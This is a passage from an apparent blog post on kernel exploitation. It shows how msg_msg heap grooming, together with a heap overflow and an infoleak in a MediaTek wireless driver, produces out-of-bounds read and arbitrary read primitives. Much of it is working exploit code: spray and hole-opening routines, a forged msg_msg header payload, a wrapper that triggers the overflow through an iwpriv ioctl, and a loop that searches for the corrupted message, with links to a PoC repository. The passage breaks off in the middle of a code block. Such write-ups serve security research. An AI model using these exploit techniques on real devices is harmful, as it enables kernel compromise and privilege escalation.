    <span class="n">info</span><span class="p">(</span><span class="s">"Suspected slow-path hits (&gt;%.1fx mean of %.0f ns) ---</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">outlier_mult</span><span class="p">,</span> <span class="n">mean</span><span class="p">);</span>
    <span class="kt">int</span> <span class="n">last_outlier_idx</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
    <span class="k">for</span> <span class="p">(</span><span class="kt">int</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">i</span> <span class="o">&lt;</span> <span class="n">NUM_MSGS</span><span class="p">;</span> <span class="n">i</span><span class="o">++</span><span class="p">)</span> <span class="p">{</span>
        <span class="k">if</span> <span class="p">(</span><span class="n">timings</span><span class="p">[</span><span class="n">i</span><span class="p">]</span> <span class="o">&gt;</span> <span class="n">outlier_mult</span> <span class="o">*</span> <span class="n">mean</span><span class="p">)</span> <span class="p">{</span>
            <span class="n">last_outlier_idx</span> <span class="o">=</span> <span class="n">i</span><span class="p">;</span>
        <span class="p">}</span>
    <span class="p">}</span>
    <span class="k">return</span> <span class="n">last_outlier_idx</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div></div>

<p>This information can be used to determine how many slots were filled in the last page that was
sprayed into and how many additional allocations will completely fill the slab. The only real
requirement for this to work is that the spray used to collect the timings must be large enough to
ensure that fresh pages <em>will</em> be allocated (the timing measurements for allocations that happened
in partial slabs are basically useless). In practice, I found that running the timed sprays after
already having sprayed a large number of allocations to pre-fill the partial slabs made the timing
measurements much more reliable.</p>

<h3 id="about-the-msg_copy-flag">about the MSG_COPY flag</h3>

<p><code class="language-plaintext highlighter-rouge">MSG_COPY</code> is a flag for <code class="language-plaintext highlighter-rouge">msgrcv()</code> that makes it possible to peek at a message without actually
dequeuing it. Most kernel exploits that use <code class="language-plaintext highlighter-rouge">msg_msg</code> heap grooming rely heavily on <code class="language-plaintext highlighter-rouge">MSG_COPY</code> for
stability: it lets you safely validate that corruption landed correctly and generally inspect the
state of the sprayed messages without destroying them in the process.</p>

<p>Without <code class="language-plaintext highlighter-rouge">MSG_COPY</code>, every call to <code class="language-plaintext highlighter-rouge">msgrcv()</code> is a one-way trip: the message is unlinked from the
queue and freed. This is a problem for exploits that corrupt <code class="language-plaintext highlighter-rouge">msg_msg</code> metadata (like some of the
ones described in this post) since <code class="language-plaintext highlighter-rouge">msgrcv()</code> will dereference the message’s <code class="language-plaintext highlighter-rouge">m_list</code> pointers
during the unlinking step – if those addresses don’t point to valid writable memory, the kernel
panics and the attempt fails. Even with valid addresses there are still a number of side effects
that can end up crashing things before the exploit can get very far.</p>
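<p>The reason both <code class="language-plaintext highlighter-rouge">m_list</code> pointers matter is visible in how a doubly linked list entry gets unlinked. The sketch below is a userspace re-implementation of that logic for illustration, not the kernel source verbatim, and the function names are my own.</p>

```c
#include <assert.h>
#include <stddef.h>

struct list_head {
    struct list_head *next, *prev;
};

/* An empty list points at itself in both directions. */
static void list_init(struct list_head *h)
{
    h->next = h;
    h->prev = h;
}

/* Append entry n at the tail of the list anchored at head. */
static void list_add_tail(struct list_head *n, struct list_head *head)
{
    n->prev = head->prev;
    n->next = head;
    head->prev->next = n;
    head->prev = n;
}

/* Unlinking performs two writes through the entry's own pointers. */
static void list_unlink(struct list_head *entry)
{
    assert(entry != NULL);
    entry->next->prev = entry->prev;   /* write through the next pointer */
    entry->prev->next = entry->next;   /* write through the prev pointer */
}
```

<p>If an overflow has replaced either pointer in a message’s <code class="language-plaintext highlighter-rouge">m_list</code>, those two stores go wherever the corrupted values point, which is why they need to reference valid writable memory.</p>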

<p><code class="language-plaintext highlighter-rouge">MSG_COPY</code> is only available if the kernel is built with <code class="language-plaintext highlighter-rouge">CONFIG_CHECKPOINT_RESTORE</code>, which not all
kernels have (the target used for this post does not). Thankfully, there are a couple of techniques
that can be used to work around these issues.</p>

<p>First, instead of sending multiple messages into a single queue during the spray, create a queue for
every message and only send a single message per queue. This way, searching through the sprayed
messages doesn’t require traversing a linked list of messages where bad pointers might get hit.</p>

<p>Second, once you’ve identified the corrupted message and finished doing whatever you’re going to do
with it (e.g. use it to leak kernel memory), don’t allow the exploit process to exit normally.
Hard-terminating the process skips the cleanup that would normally flush the remaining messages
from the queues, so the dangerous frees on potentially corrupted pointers never happen. This cuts
down on the instability and crashes that come from freeing bad pointers.
<em>This technique applies even when <code class="language-plaintext highlighter-rouge">MSG_COPY</code> is available</em> because the messages will still get
freed eventually when the exploit process exits (assuming it takes the graceful exit path).</p>

<h3 id="code-walkthrough-of-the-grooming-sequence">code walkthrough of the grooming sequence</h3>

<p>Now that the key details for <code class="language-plaintext highlighter-rouge">msg_msg</code> have been covered, let’s spend a moment talking about
how this gets implemented in practice. All of the techniques below use a variation of the
same heap spraying strategy so it’s best to explain it here once and then highlight any important
adjustments made for individual techniques.</p>

<p>During the initial development phase I created the following set of wrapper functions to make
initializing queues and setting up the sprays a bit easier. They’re very simple:</p>

<ul>
  <li><code class="language-plaintext highlighter-rouge">init_msgq()</code>: creates <code class="language-plaintext highlighter-rouge">cnt</code> number of message queues where the actual messages will be written</li>
  <li><code class="language-plaintext highlighter-rouge">msgq_spray()</code>: send messages of <code class="language-plaintext highlighter-rouge">size</code> bytes into <code class="language-plaintext highlighter-rouge">numqs</code> queues (i.e. spray messages)</li>
  <li><code class="language-plaintext highlighter-rouge">msgq_spray_mark()</code>: a variation on <code class="language-plaintext highlighter-rouge">msgq_spray()</code> that stamps a unique
  marker value into each message body, to use as a cookie for identifying corrupted messages</li>
  <li><code class="language-plaintext highlighter-rouge">msgq_open_holes*()</code>: open “holes” in the sprayed regions by reading messages back from the
  queues. a couple of variations are used but the most common is reading back from every other
  queue so that the opened slots are all adjacent to the other <code class="language-plaintext highlighter-rouge">msg_msg</code> objects</li>
</ul>

<p>I won’t list the code for each of these functions here since they’re pretty trivial, but take a look
at the linked <a href="https://github.com/mellow-hype/mtk-kernel-alchemy" target="_blank">GitHub repo</a> with the exploits if you’re interested in the implementation details.</p>
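
<p>For readers who want a rough picture without opening the repo, here is a minimal sketch of what helpers like these could look like. To be clear, this is not the code from the repo: the <code class="language-plaintext highlighter-rouge">sketch_*</code> names, the argument order, and the choice to stamp the queue index into the body as the marker are all assumptions made for illustration.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code>#include &lt;stddef.h&gt;
#include &lt;string.h&gt;
#include &lt;sys/ipc.h&gt;
#include &lt;sys/msg.h&gt;

#define SKETCH_BODY_MAX 256

struct sketch_msgbuf {
    long mtype;
    char mtext[SKETCH_BODY_MAX];
};

/* Create cnt private queues; returns 0 on success, -1 on failure. */
int sketch_init_queues(int *qids, int cnt)
{
    for (int i = 0; i &lt; cnt; i++) {
        qids[i] = msgget(IPC_PRIVATE, IPC_CREAT | 0600);
        if (qids[i] &lt; 0)
            return -1;
    }
    return 0;
}

/* Send one message with `size` body bytes into each queue, stamping the
 * queue index into the start of the body as a marker. */
int sketch_spray_mark(const int *qids, int cnt, long mtype, size_t size)
{
    struct sketch_msgbuf m;

    if (size &lt; sizeof(int) || size &gt; SKETCH_BODY_MAX)
        return -1;
    for (int i = 0; i &lt; cnt; i++) {
        m.mtype = mtype;
        memset(m.mtext, 'A', size);
        memcpy(m.mtext, &amp;i, sizeof(i));
        if (msgsnd(qids[i], &amp;m, size, IPC_NOWAIT) &lt; 0)
            return -1;
    }
    return 0;
}

/* Receive (and thereby free) the message in every even-indexed queue.
 * Returns the number of holes opened, or -1 on failure. */
int sketch_open_holes_even(const int *qids, int cnt, long mtype, size_t size)
{
    struct sketch_msgbuf m;
    int holes = 0;

    if (size &gt; SKETCH_BODY_MAX)
        return -1;
    for (int i = 0; i &lt; cnt; i += 2) {
        if (msgrcv(qids[i], &amp;m, size, mtype, IPC_NOWAIT) &lt; 0)
            return -1;
        holes++;
    }
    return holes;
}
</code></pre></div></div>

<p>Keeping one message per queue means each receive touches exactly one <code class="language-plaintext highlighter-rouge">msg_msg</code>, which is the property the first workaround above relies on.</p>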

<p>This is how the functions are typically used in the examples:</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code>    <span class="c1">// step 1: create MSG_COUNT message queues</span>
    <span class="n">info</span><span class="p">(</span><span class="s">"create message queues: (%d)"</span><span class="p">,</span> <span class="n">MSG_COUNT</span><span class="p">);</span>
    <span class="n">init_msgq</span><span class="p">(</span><span class="n">qids_1</span><span class="p">,</span> <span class="n">MSG_COUNT</span><span class="p">);</span>

    <span class="c1">// step 2: spray MSG_COUNT messages, 1 message per queue</span>
    <span class="n">info</span><span class="p">(</span><span class="s">"spray primary messages"</span><span class="p">);</span>
    <span class="n">msgq_spray_mark</span><span class="p">(</span><span class="n">qids_1</span><span class="p">,</span> <span class="n">MSG_COUNT</span><span class="p">,</span> <span class="n">dummy</span><span class="p">,</span> <span class="n">ORIG_BODY_SIZE</span><span class="p">);</span>

    <span class="c1">// step 3: open holes in the sprayed region by reading back the message from every other queue</span>
    <span class="c1">// in the range that was sprayed so that the open slots all sit adjacent to allocated messages</span>
    <span class="n">info</span><span class="p">(</span><span class="s">"poke holes in primary messages"</span><span class="p">);</span>
    <span class="n">msgq_open_holes_even</span><span class="p">(</span><span class="n">qids_1</span><span class="p">,</span> <span class="n">MSG_COUNT</span><span class="p">,</span> <span class="n">MTYPE_ORIG</span><span class="p">,</span> <span class="n">ORIG_BODY_SIZE</span><span class="p">);</span>
</code></pre></div></div>

<p>After the three steps above are complete, the layout of the slab where the messages are allocated
ends up looking something like this:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code># after step 2: msg_msg objects fill the slab
&lt;msg_msg&gt; | &lt;msg_msg&gt; | &lt;msg_msg&gt; | &lt;msg_msg&gt; | &lt;msg_msg&gt; | &lt;msg_msg&gt; | &lt;msg_msg&gt; | &lt;msg_msg&gt;

# after step 3: alternate holes in sprayed messages
&lt;msg_msg&gt; |  &lt;HOLE&gt;   | &lt;msg_msg&gt; |  &lt;HOLE&gt;   | &lt;msg_msg&gt; |  &lt;HOLE&gt;   | &lt;msg_msg&gt; |  &lt;HOLE&gt;
</code></pre></div></div>

<p>This heap layout is ideal for using an overflow to target <code class="language-plaintext highlighter-rouge">msg_msg</code> objects themselves but it can
easily be adapted for targeting other objects by opening up multiple slots right next to each other
so that target objects and vulnerable objects (e.g. overflowed buffers) get allocated next to
each other. Different approaches are needed for different exploit strategies but the grooming
primitives <code class="language-plaintext highlighter-rouge">msg_msg</code> provides are super flexible so it’s usually possible to make things work once
you’ve got a feel for how the allocator behaves on the target.</p>

<h2 id="exploring-the-technique-space">exploring the technique space</h2>

<p>With the foundations in place, let’s move on to talking about what can be accomplished with just a
heap overflow and heap address leak as a starting point. The code for each of the techniques
discussed below can be found <a href="https://github.com/mellow-hype/mtk-kernel-alchemy" target="_blank">here</a>.</p>

<h3 id="tech-oob-read-via-msg_msgm_ts-field-corruption">tech: OOB read via msg_msg.m_ts field corruption</h3>

<p><strong>PoC: <code class="language-plaintext highlighter-rouge">primitives-dev-vie/vie-oper-minimal-msgmsg-leak-v2.c</code></strong></p>

<p>One of the cool things we can do with <code class="language-plaintext highlighter-rouge">msg_msg</code> that isn’t just heap spraying is to combine it with
a heap overflow bug to get an OOB read primitive and leak kernel data. If we can overflow into an
adjacent <code class="language-plaintext highlighter-rouge">msg_msg</code> in memory and corrupt the <code class="language-plaintext highlighter-rouge">m_ts</code> (message text size) field with a large value,
then when <code class="language-plaintext highlighter-rouge">msgrcv()</code> reads that message back, it’ll read past the end of the message and leak
whatever is adjacent in the slab.</p>

<p>This is a common starting technique in kernel exploitation and a good first primitive to build from
a heap overflow. Beyond the direct utility as an infoleak, it’s also useful for gaining visibility
into slab layouts when working without direct introspection capabilities.</p>

<h4 id="heap-grooming-setup">heap grooming setup</h4>

<p>The heap grooming for this technique is identical to the example provided in the previous
section so I’m not going to repeat it all here but the basic sequence is:</p>

<ol>
  <li>Create N message queues</li>
  <li>Send 1 message on each queue to spray a total of N messages</li>
  <li>Read back M messages from a range of the sprayed queues/messages, reading only every other message, to open up holes where target allocations can be placed adjacent to allocated <code class="language-plaintext highlighter-rouge">msg_msg</code> structs</li>
</ol>

<p>There are a couple of specific values and fields that are worth mentioning since they play an
important role in how this technique is implemented.</p>

<p>First, the initial messages which are sprayed use an <code class="language-plaintext highlighter-rouge">m_ts</code> value of 0x40 to ensure the messages
land in the target slab cache (kmalloc-128). This field can then be used to determine whether the
attempt was successful or not: if we find any messages which don’t have the expected size, we know
we successfully corrupted the <code class="language-plaintext highlighter-rouge">m_ts</code> field.</p>
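
<p>The arithmetic behind that size choice is easy to sanity check. The sketch below is a rough model rather than anything from the PoCs: it assumes a 64-bit <code class="language-plaintext highlighter-rouge">struct msg_msg</code> header of 0x30 bytes and the generic kmalloc bucket sizes, and <code class="language-plaintext highlighter-rouge">sketch_kmalloc_bucket()</code> is a hypothetical helper. With a 0x40 byte body the allocation is 0x30 + 0x40 = 0x70 (112) bytes, which rounds up to the 128-byte cache.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code>#include &lt;stddef.h&gt;

/* Assumed sizeof(struct msg_msg) on a 64-bit kernel:
 * m_list (16) + m_type (8) + m_ts (8) + next (8) + security (8). */
#define SKETCH_MSG_HDR_SIZE 0x30

/* Return the general-purpose kmalloc cache size a request of `size` bytes
 * would be served from, given the platform's minimum kmalloc size.
 * Returns 0 for requests larger than the biggest bucket modelled here. */
size_t sketch_kmalloc_bucket(size_t size, size_t min_size)
{
    static const size_t buckets[] = {
        8, 16, 32, 64, 96, 128, 192, 256, 512, 1024, 2048, 4096, 8192
    };

    for (size_t i = 0; i &lt; sizeof(buckets) / sizeof(buckets[0]); i++) {
        size_t b = buckets[i];
        if (b &lt; min_size)
            continue;
        /* assumption: the 96 and 192 caches only exist when the minimum
         * kmalloc size is small enough */
        if ((b == 96 &amp;&amp; min_size &gt; 32) || (b == 192 &amp;&amp; min_size &gt; 64))
            continue;
        if (size &lt;= b)
            return b;
    }
    return 0;
}
</code></pre></div></div>

<p>For example, <code class="language-plaintext highlighter-rouge">sketch_kmalloc_bucket(SKETCH_MSG_HDR_SIZE + 0x40, 8)</code> gives 128, and the result stays 128 if the platform’s minimum kmalloc size is itself 128.</p>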

<p>Second, the sprayed messages are sent with a specific value in the <code class="language-plaintext highlighter-rouge">mtype</code> field which serves as a
unique identifier to distinguish between different types of messages. Again, we can use this as a
canary to determine whether we successfully corrupted the structure; more importantly, the <code class="language-plaintext highlighter-rouge">mtype</code>
value is used as a filter in calls to <code class="language-plaintext highlighter-rouge">msgrcv()</code>. This is important when <code class="language-plaintext highlighter-rouge">MSG_COPY</code> is unavailable
– if we use an <code class="language-plaintext highlighter-rouge">mtype</code> value of <code class="language-plaintext highlighter-rouge">0xBBBB</code> for the sprayed messages and then use that same <code class="language-plaintext highlighter-rouge">mtype</code>
value when calling <code class="language-plaintext highlighter-rouge">msgrcv()</code> to check the messages for corruption, we’ll dequeue and free each of
the messages we sprayed, messing up the heap layout. So, instead, we use the overflow to set the
<code class="language-plaintext highlighter-rouge">mtype</code> of the corrupted <code class="language-plaintext highlighter-rouge">msg_msg</code> to a different value and then use that as the filter when
searching through the messages. If the exploit is successful, then there should only be one message
with that <code class="language-plaintext highlighter-rouge">mtype</code> and the call to <code class="language-plaintext highlighter-rouge">msgrcv()</code> will ONLY operate on that message, leaving everything
else intact.</p>
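
<p>The filtering behavior this relies on can be checked from userspace without any bug involved. The following is a small sketch with a made-up helper name (<code class="language-plaintext highlighter-rouge">sketch_filter_leaves_queue_intact()</code>): it sends one message with the spray <code class="language-plaintext highlighter-rouge">mtype</code>, asks <code class="language-plaintext highlighter-rouge">msgrcv()</code> for a different type, and then uses <code class="language-plaintext highlighter-rouge">IPC_STAT</code> to confirm the sprayed message is still queued.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code>#include &lt;errno.h&gt;
#include &lt;stddef.h&gt;
#include &lt;string.h&gt;
#include &lt;sys/ipc.h&gt;
#include &lt;sys/msg.h&gt;

/* Returns the number of messages still queued after a msgrcv() that asks
 * for a type nobody sent, or -1 if the demo could not run. */
int sketch_filter_leaves_queue_intact(long spray_type, long poison_type)
{
    struct { long mtype; char mtext[64]; } m;
    struct msqid_ds ds;
    int remaining = -1;

    int qid = msgget(IPC_PRIVATE, IPC_CREAT | 0600);
    if (qid &lt; 0)
        return -1;

    m.mtype = spray_type;
    memset(m.mtext, 'A', sizeof(m.mtext));
    if (msgsnd(qid, &amp;m, sizeof(m.mtext), IPC_NOWAIT) == 0) {
        /* positive msgtyp: only a message of exactly that type matches */
        errno = 0;
        long ret = msgrcv(qid, &amp;m, sizeof(m.mtext), poison_type, IPC_NOWAIT);
        if (ret &lt; 0 &amp;&amp; errno == ENOMSG &amp;&amp; msgctl(qid, IPC_STAT, &amp;ds) == 0)
            remaining = (int)ds.msg_qnum;
    }

    msgctl(qid, IPC_RMID, NULL);
    return remaining;
}
</code></pre></div></div>

<p>With the values from the text, <code class="language-plaintext highlighter-rouge">sketch_filter_leaves_queue_intact(0xBBBB, 0x6666666666666690)</code> should report one message remaining: the failed search did not dequeue anything.</p>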

<h4 id="building-the-payload">building the payload</h4>

<p>The corruption payload needs to construct a fake <code class="language-plaintext highlighter-rouge">msg_msg</code> header to overwrite a valid message in a
way that the kernel will accept without immediately panicking. The key fields that are relevant are:</p>

<ul>
  <li>
    <p><strong><code class="language-plaintext highlighter-rouge">m_list</code> pointers (<code class="language-plaintext highlighter-rouge">prev</code>/<code class="language-plaintext highlighter-rouge">next</code>)</strong>: These need to be valid writable kernel addresses. As
mentioned earlier, <code class="language-plaintext highlighter-rouge">msgrcv()</code> calls <code class="language-plaintext highlighter-rouge">list_del()</code> to unlink the message, which writes through these
pointers. This PoC uses the address leaked by the <code class="language-plaintext highlighter-rouge">RTMPIoctlMAC()</code> infoleak.</p>
  </li>
  <li>
    <p><strong><code class="language-plaintext highlighter-rouge">mtype</code></strong>: We want to set this to a “poison” value so we can identify the corrupted message when
searching through queues as mentioned above. It should be distinct from the <code class="language-plaintext highlighter-rouge">mtype</code> value used for
the messages used during the spraying phase (duh). The PoC uses <code class="language-plaintext highlighter-rouge">0x6666666666666690</code> to avoid
bytes restricted by the <code class="language-plaintext highlighter-rouge">vie_oper_proc</code> bug.</p>
  </li>
  <li>
    <p><strong><code class="language-plaintext highlighter-rouge">m_ts</code></strong>: The inflated size to use. When <code class="language-plaintext highlighter-rouge">msgrcv()</code> processes the message, it reads <code class="language-plaintext highlighter-rouge">m_ts</code>
bytes starting from the body. <code class="language-plaintext highlighter-rouge">m_ts</code> can hold up to <code class="language-plaintext highlighter-rouge">0xffffffffffffffff</code> but in practice using
such large values isn’t necessary (or even desirable). I used <code class="language-plaintext highlighter-rouge">0x1660</code> in the PoC to read a little
over a page (4KB) past the end of the message allocation.</p>
  </li>
</ul>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">struct</span> <span class="n">fake_msg</span> <span class="p">{</span>
    <span class="kt">uint64_t</span> <span class="n">m_next</span><span class="p">;</span>    <span class="c1">// m_list.next: valid writable address</span>
    <span class="kt">uint64_t</span> <span class="n">m_prev</span><span class="p">;</span>    <span class="c1">// m_list.prev: same</span>
    <span class="kt">uint64_t</span> <span class="n">mtype</span><span class="p">;</span>     <span class="c1">// poison value for identification</span>
    <span class="kt">uint64_t</span> <span class="n">m_ts</span><span class="p">;</span>      <span class="c1">// inflated size for OOB read</span>
<span class="p">};</span>

<span class="cp">#define MTYPE_POISON 0x6666666666666690
</span>
<span class="k">struct</span> <span class="n">fake_msg</span> <span class="n">fake_msg</span><span class="p">;</span>
<span class="n">fake_msg</span><span class="p">.</span><span class="n">m_next</span> <span class="o">=</span> <span class="n">mac_leaked</span><span class="p">;</span>
<span class="n">fake_msg</span><span class="p">.</span><span class="n">m_prev</span> <span class="o">=</span> <span class="n">mac_leaked</span><span class="p">;</span>
<span class="n">fake_msg</span><span class="p">.</span><span class="n">mtype</span>  <span class="o">=</span> <span class="n">MTYPE_POISON</span><span class="p">;</span>
<span class="n">fake_msg</span><span class="p">.</span><span class="n">m_ts</span>   <span class="o">=</span> <span class="mh">0x1660</span><span class="p">;</span>

<span class="c1">// wrapper that triggers the vie_oper_proc bug with the payload placed at the slab slot boundary</span>
<span class="n">primitive_vie_oper_proc_oob_write</span><span class="p">(</span><span class="n">ifname</span><span class="p">,</span> <span class="p">(</span><span class="kt">void</span><span class="o">*</span><span class="p">)</span><span class="o">&amp;</span><span class="n">fake_msg</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">fake_msg</span><span class="p">));</span>
</code></pre></div></div>

<p>In regard to the <code class="language-plaintext highlighter-rouge">m_list</code> pointers and <code class="language-plaintext highlighter-rouge">mtype</code> field, it’s important to note that these fields are
only relevant in this case because the bug used to corrupt <code class="language-plaintext highlighter-rouge">m_ts</code> is a linear overflow that <em>must</em>
corrupt those other fields in order to reach <code class="language-plaintext highlighter-rouge">m_ts</code>. In cases where the starting bug allows for
direct corruption of <code class="language-plaintext highlighter-rouge">m_ts</code> without altering other fields (e.g. use-after-free), that’s the only
thing needed to get the OOB read.</p>

<h4 id="trigger-the-overflow-to-corrupt-msg_msg">trigger the overflow to corrupt msg_msg</h4>

<p>After the heap grooming setup is complete, the next step is to trigger the corruption which will let
us inflate the <code class="language-plaintext highlighter-rouge">m_ts</code> size of one of the allocated <code class="language-plaintext highlighter-rouge">msg_msg</code> objects. The function below wraps the
main logic used to construct the payload for the <code class="language-plaintext highlighter-rouge">vie_oper_proc()</code> bug and send it over an <code class="language-plaintext highlighter-rouge">ioctl()</code>
call: we compute the offset in the payload where we’ll start corrupting an adjacent object in the
slab cache, construct the initial payload buffer with the <code class="language-plaintext highlighter-rouge">vie_oper_proc()</code> command in the format
required to trigger the bug, and insert the data that will overwrite the target object at the
computed offset.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kt">void</span> <span class="nf">primitive_vie_oper_proc_oob_write</span><span class="p">(</span><span class="kt">char</span> <span class="o">*</span><span class="n">ifname</span><span class="p">,</span> <span class="kt">uint8_t</span> <span class="o">*</span><span class="n">data</span><span class="p">,</span> <span class="kt">size_t</span> <span class="n">size</span><span class="p">)</span> <span class="p">{</span>
    <span class="kt">size_t</span> <span class="n">corruption_offset</span> <span class="o">=</span> <span class="n">strlen</span><span class="p">(</span><span class="n">VIE_OPER_CMD</span><span class="p">)</span> <span class="o">+</span> <span class="n">VIE_OPER_MIN_SIZE_TO_OVF</span><span class="p">;</span>
    <span class="kt">size_t</span> <span class="n">payload_size</span> <span class="o">=</span> <span class="n">strlen</span><span class="p">(</span><span class="n">VIE_OPER_CMD</span><span class="p">)</span> <span class="o">+</span> <span class="n">VIE_OPER_MIN_SIZE_TO_OVF</span> <span class="o">+</span> <span class="n">size</span><span class="p">;</span>
    <span class="kt">uint8_t</span> <span class="o">*</span><span class="n">payload</span> <span class="o">=</span> <span class="n">malloc</span><span class="p">(</span><span class="n">payload_size</span><span class="p">);</span>

    <span class="c1">// check for restricted bytes and bail out if we find any</span>
    <span class="k">if</span> <span class="p">(</span><span class="n">vie_oper_proc_check_bytes</span><span class="p">(</span><span class="n">data</span><span class="p">,</span> <span class="n">size</span><span class="p">)</span> <span class="o">&lt;</span> <span class="mi">0</span><span class="p">)</span> <span class="p">{</span>
        <span class="n">free</span><span class="p">(</span><span class="n">payload</span><span class="p">);</span>    <span class="c1">// don't leak the buffer on the early exit</span>
        <span class="k">return</span><span class="p">;</span>           <span class="c1">// void function, so no return value</span>
    <span class="p">}</span>

    <span class="n">memset</span><span class="p">(</span><span class="n">payload</span><span class="p">,</span> <span class="mh">0x30</span><span class="p">,</span> <span class="n">payload_size</span><span class="p">);</span> <span class="cm">/* non-NULL to avoid restricted bytes */</span>

    <span class="c1">// copy in the "command" string for iwpriv formatted to trigger the vuln</span>
    <span class="n">memcpy</span><span class="p">(</span><span class="n">payload</span><span class="p">,</span> <span class="n">VIE_OPER_CMD</span><span class="p">,</span> <span class="n">strlen</span><span class="p">(</span><span class="n">VIE_OPER_CMD</span><span class="p">));</span>

    <span class="c1">// copy in the true payload data at the offset where we start corrupting the next object</span>
    <span class="n">memcpy</span><span class="p">(</span><span class="n">payload</span> <span class="o">+</span> <span class="n">corruption_offset</span><span class="p">,</span> <span class="n">data</span><span class="p">,</span> <span class="n">size</span><span class="p">);</span>

    <span class="c1">// send the iwpriv command via an ioctl (cleaner than executing via the shell)</span>
    <span class="n">ioctl_send_iwpriv_set</span><span class="p">(</span><span class="n">ifname</span><span class="p">,</span> <span class="n">payload</span><span class="p">,</span> <span class="n">payload_size</span><span class="p">);</span>
    <span class="n">free</span><span class="p">(</span><span class="n">payload</span><span class="p">);</span>
<span class="p">}</span>
</code></pre></div></div>

<p>After the overflow is triggered, the heap looks something like this:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code># vulnerable buf fills a hole, corrupts adjacent msg_msg
&lt;msg_msg&gt; &lt;vie_oper_buf&gt; &lt;msg_msg&gt; &lt;-HOLE-&gt; &lt;msg_msg&gt; &lt;HOLE&gt; &lt;msg_msg&gt; &lt;msg_msg&gt;
| ...... | AAAAAAAAAAAA | AAAA... |  ....  | .... |
</code></pre></div></div>

<h4 id="reading-back-the-corrupted-message">reading back the corrupted message</h4>

<p>After triggering the overflow, the corrupted message is somewhere in the sprayed messages. We don’t
know exactly which queue it’s in, so we search backwards through the queues looking for a message
with the poison <code class="language-plaintext highlighter-rouge">mtype</code> value:</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">for</span> <span class="p">(</span><span class="kt">int</span> <span class="n">i</span> <span class="o">=</span> <span class="n">MSG_COUNT</span> <span class="o">-</span> <span class="mi">1</span><span class="p">;</span> <span class="n">i</span> <span class="o">&gt;</span> <span class="mi">0</span><span class="p">;</span> <span class="n">i</span><span class="o">--</span><span class="p">)</span> <span class="p">{</span>
    <span class="n">read_back</span> <span class="o">=</span> <span class="n">msgrcv</span><span class="p">(</span><span class="n">qids</span><span class="p">[</span><span class="n">i</span><span class="p">],</span> <span class="n">peekbuf</span><span class="p">,</span> <span class="n">PEEKSIZE</span><span class="p">,</span> <span class="n">MTYPE_POISON</span><span class="p">,</span> <span class="n">IPC_NOWAIT</span><span class="p">);</span>
    <span class="k">if</span> <span class="p">(</span><span class="n">read_back</span> <span class="o">&gt;</span> <span class="mi">0</span> <span class="o">&amp;&amp;</span> <span class="n">read_back</span> <span class="o">!=</span> <span class="n">ORIG_BODY_SIZE</span><span class="p">)</span> <span class="p">{</span>
        <span class="cm">/* found it: read_back != original body size means the inflated m_ts was used */</span>
        <span class="k">break</span><span class="p">;</span>
    <span class="p">}</span>
<span class="p">}</span>
</code></pre></div></div>

<p>Getting <strong>any</strong> message back on this search confirms the corruption happened (<code class="language-plaintext highlighter-rouge">mtype</code> was changed)
and getting back any number of bytes other than the original size of the sprayed messages confirms
the <code class="language-plaintext highlighter-rouge">m_ts</code> field was corrupted.</p>

<p>When this hits, <code class="language-plaintext highlighter-rouge">peekbuf</code> contains the original message body followed by whatever was adjacent in
the slab. The leaked data in the output of the PoC shows the adjacent <code class="language-plaintext highlighter-rouge">msg_msg</code> headers from the spray: the
<code class="language-plaintext highlighter-rouge">m_list</code> pointers of the linked list structure, the <code class="language-plaintext highlighter-rouge">mtype</code> values from the spray pattern (<code class="language-plaintext highlighter-rouge">0xab</code>),
and body sizes matching the original message size (<code class="language-plaintext highlighter-rouge">0x40</code>).</p>

<p><img src="/assets/images/mtk-images/mtk-r1kh-msg-m_ts-oob-read.png" alt="mtk-r1kh-msg-m_ts-oob-read.png" /></p>

<h3 id="tech-arbitrary-address-readfree-via-msg_msgnext-pointer-corruption">tech: arbitrary address read+free via msg_msg.next pointer corruption</h3>

<p>There’s actually another infoleak primitive that we can get through <code class="language-plaintext highlighter-rouge">msg_msg</code> corruption using the
exact same approach as the OOB read above, but overflowing an additional 8 bytes to corrupt the
<code class="language-plaintext highlighter-rouge">msg_msg.next</code> field of the message.</p>

<p>For messages which are split into segments (i.e. messages larger than
<code class="language-plaintext highlighter-rouge">PAGESZ - sizeof(struct msg_msg)</code>), the <code class="language-plaintext highlighter-rouge">msg_msg.next</code> field will contain a pointer to the first <code class="language-plaintext highlighter-rouge">msg_msgseg</code> segment for the
message. When the message is read back from the queue, <code class="language-plaintext highlighter-rouge">store_msg()</code> checks whether <code class="language-plaintext highlighter-rouge">msg_msg.next</code>
is non-NULL, and if it is, it reads from that pointer and appends the data to the
body of the message returned to userspace at the offset where the segment would start.</p>

<p>I think you can see where this is going. If we know the address of some kernel memory we want to
read from, all we have to do is place that address at the offset of <code class="language-plaintext highlighter-rouge">msg_msg.next</code> during the
overflow and then read back the corrupted message from the queue using the same search loop used
above. Once the corrupted message is found, the data returned in the body will contain the content
stored at the target address.</p>
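
<p>To make the copy logic concrete, here is a userspace model of it. This is a simplified sketch and not kernel code: the <code class="language-plaintext highlighter-rouge">model_*</code> names are invented, and the two <code class="language-plaintext highlighter-rouge">MODEL_DATALEN_*</code> constants are tiny stand-ins for the page-sized limits the kernel uses. The loop structure follows my reading of <code class="language-plaintext highlighter-rouge">store_msg()</code>, where segment data lives right after the segment’s own <code class="language-plaintext highlighter-rouge">next</code> pointer.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code>#include &lt;stddef.h&gt;
#include &lt;string.h&gt;

#define MODEL_DATALEN_MSG 16 /* stand-in for the first-chunk limit */
#define MODEL_DATALEN_SEG 24 /* stand-in for the per-segment limit */

struct model_seg {
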